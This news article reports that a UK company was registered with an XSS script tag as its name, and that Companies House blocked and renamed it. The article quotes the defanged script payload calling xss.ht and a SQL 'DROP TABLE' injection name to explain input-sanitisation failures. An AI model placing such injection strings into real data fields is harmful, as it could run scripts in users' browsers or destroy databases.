Why, yes, you can register an XSS attack as a UK company name. How do we know that? Someone actually did it

And the 'acceptable company name' charset is hardcoded... in legislation


Companies House has blocked someone who registered a new biz with a name that contained the right characters arranged in the right order to trigger a cross-site scripting (XSS) attack against users of the service's API.

The company in question, registered number 12956509, was originally signed up with the UK's official company registrar under the name:

">< SCRIPT SRC[=]HTTPS[:]//MJT.XSS.HT> LTD

Its name didn't contain the square brackets, meaning anyone reading company names off the Companies House API would potentially run a script from the web address above.

A person using the username michaeltandy on the Companies House developer forum later posted: "I had assumed I wouldn't be the first person to use < and > (they are, after all, both explicitly whitelisted as legal characters) and that 99 per cent of systems would already be escaping them... I would just get a company with a playful name that would elicit a knowing chuckle from the kind of people we'd be doing business with!"

The poster continued: "Once it turned out there were non-trivial problems, and that fact became more widely publicised, we can't expect every consumer of data to do a full XSS audit in only a few days."

Although whoever registered the company seems to have had non-hostile intentions – xss.ht is a domain owned by the XSS Hunter service, as explained on its main website – the vulnerability it exposes is not unique.

Such tomfoolery has been carried out in the past, aided by a legal requirement that certain punctuation marks are available for companies to use in their names. Thus was born "; DROP TABLE "COMPANIES";-- LTD" and "SAFDASD & SFSAF \' SFDAASF\" LTD", both of which were exploiting the availability of punctuation marks to put commands into the company name field.

Tech lawyer Neil Brown of decoded.legal told The Register: "This is symbolic – if one might excuse the pun – of a regime which considers individual characters in isolation, and not the effect of the combination of those characters." He explained that while section 53 of the Companies Act 2000 does stop people from registering companies with "offensive" names or names that were a criminal offence to publish, it's not clear whether that is enough to stop people registering database commands as company names.

"Would using an XSS attack constitute an offence? Even with the state of the Computer Misuse Act 1990, that would be a stretch too far. Is it offensive? I don't think so, but then I'm not the Secretary of State," opined Brown, who also pointed out yet another crappy company name.

As for lessons to be drawn from this, Brown wondered if simply advising people to sanitise inputs from official systems was "too dull" for El Reg. We happen to agree but it's also the sort of common-sense advice someone, somewhere, might actually benefit from. The BBC Bitesize guide to input sanitisation (don't laugh, we all started somewhere) can be found here.

A Companies House spokesman told The Register: "A company was registered using characters that could have presented a security risk to a limited number of our customers, if published on unprotected external websites. We have taken immediate steps to mitigate this risk."

He added: "We are confident that Companies House services remain secure."

And indeed Companies House is secure: company number 12956509 is now called "THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD". ®

Bootnotes

Drop Table Companies Ltd (add the necessary script marks at your leisure) was a practical joke by tech bod Sam Pizzey, who blogged about it at the time. He wrote: "The company name is a bit of hacker sleight-of-hand... or as some astute people have put it, it's 'wrong'. Of course it's wrong – I'm not a total arsehole!"

Multiple people also registered Openreach Ltd over the years until BT woke up and registered the company name itself.

Similar topics

Broader topics

Narrower topics


Other stories you might like

  • Running Windows 10? Microsoft is preparing to fire up the update engines

    Winter Windows Is Coming

    It's coming. Microsoft is preparing to start shoveling the latest version of Windows 10 down the throats of refuseniks still clinging to older incarnations.

    The Windows Update team gave the heads-up through its Twitter orifice last week. Windows 10 2004 was already on its last gasp, have had support terminated in December. 20H2, on the other hand, should be good to go until May this year.

    Continue reading
  • Throw away your Ethernet cables* because MediaTek says Wi-Fi 7 will replace them

    *Don't do this

    MediaTek claims to have given the world's first live demo of Wi-Fi 7, and said that the upcoming wireless technology will be able to challenge wired Ethernet for high-bandwidth applications, once available.

    The fabless Taiwanese chip firm said it is currently showcasing two Wi-Fi 7 demos to key customers and industry collaborators, in order to demonstrate the technology's super-fast speeds and low latency transmission.

    Based on the IEEE 802.11be standard, the draft version of which was published last year, Wi-Fi 7 is expected to provide speeds several times faster than Wi-Fi 6 kit, offering connections of at least 30Gbps and possibly up to 40Gbps.

    Continue reading
  • Windows box won't boot? SystemRescue 9 may help

    An ISO image you can burn or drop onto a USB key

    The latest version of an old friend of the jobbing support bod has delivered a new kernel to help with fixing Microsoft's finest.

    It used to be called the System Rescue CD, but who uses CDs any more? Enter SystemRescue, an ISO image that you can burn, or just drop onto your Ventoy USB key, and which may help you to fix a borked Windows box. Or a borked Linux box, come to that.

    SystemRescue 9 includes Linux kernel 5.15 and a minimal Xfce 4.16 desktop (which isn't loaded by default). There is a modest selection of GUI tools: Firefox, VNC and RDP clients and servers, and various connectivity tools – SSH, FTP, IRC. There's also some security-related stuff such as Yubikey setup, KeePass, token management, and so on. The main course is a bunch of the usual Linux tools for partitioning, formatting, copying, and imaging disks. You can check SMART status, mount LVM volumes, rsync files, and other handy stuff.

    Continue reading

Biting the hand that feeds IT © 1998–2022